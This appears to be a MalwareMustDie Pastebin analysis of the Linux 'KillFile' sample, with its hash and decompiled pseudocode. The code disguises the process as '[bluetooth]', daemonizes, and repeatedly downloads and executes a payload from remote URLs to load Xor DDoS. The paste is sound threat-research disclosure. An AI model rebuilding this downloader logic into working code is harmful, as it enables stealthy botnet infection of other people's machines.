Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Linux/KillFile (made in China)
- It downloaded and execute the Xor DDoS filelessly
- hash : 82ba1e7c02b91ee4298717f9a8ba20aae3063107c8d818463ceb5829e5746b48 (uploaded to VT)
- Reverse result:
- void main(int a1, char arg2)
- {
- size_t var_length_procname; from EAX
- var_length_procname = strlen(*arg2);
- memset(*arg2, 0, var_length_procname);
- memcpy(*arg2, "[bluetooth]", 0xCu);
- daemon(1, 0);
- nice(-20);
- while ( 1 )
- {
- if ( kill_time > 4 )
- {
- kill_time = 0;
- killfileandpid();
- RunFile();
- }
- ++kill_time;
- sleep(1);
- }
- }
- __pid_t killfileandpid()
- {
- __pid_t result; from EAX
- result = fork();
- if ( result >= 0 )
- {
- if ( !result )
- {
- setsid();
- umask(0);
- KillProcess();
- }
- result = wait(0);
- }
- return result;
- }
- void __noreturn KillProcess()
- {
- int v0;
- char s[10240];
- int i;
- memset(s, 0, 0x2800); // buffer for file
- memset(&v0, 0, 0x2800); // buffer for mem
- for ( i = 0; ; ++i )
- {
- if ( i > 3 )
- _exit(0);
- sprintf(&v0, "%s%s", *(DWORD)&Remote_URL[i], "/txt/kill.txt");
- if ( http_download(&v0, s, 0) ) // forming HTTP request "GET %s HTTP/1.1\r\n%sHost: %s\r\n%s"; save as file s
- break;
- }
- if ( s[strlen(s) - 1] == 10 )
- s[strlen(s) - 1] = 0;
- GetProcess(s); // use proc/exec to execute downloaded file and delete the file after exec
- _exit(0);
- }
- @unixfreaxjp #MalwareMustDie
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement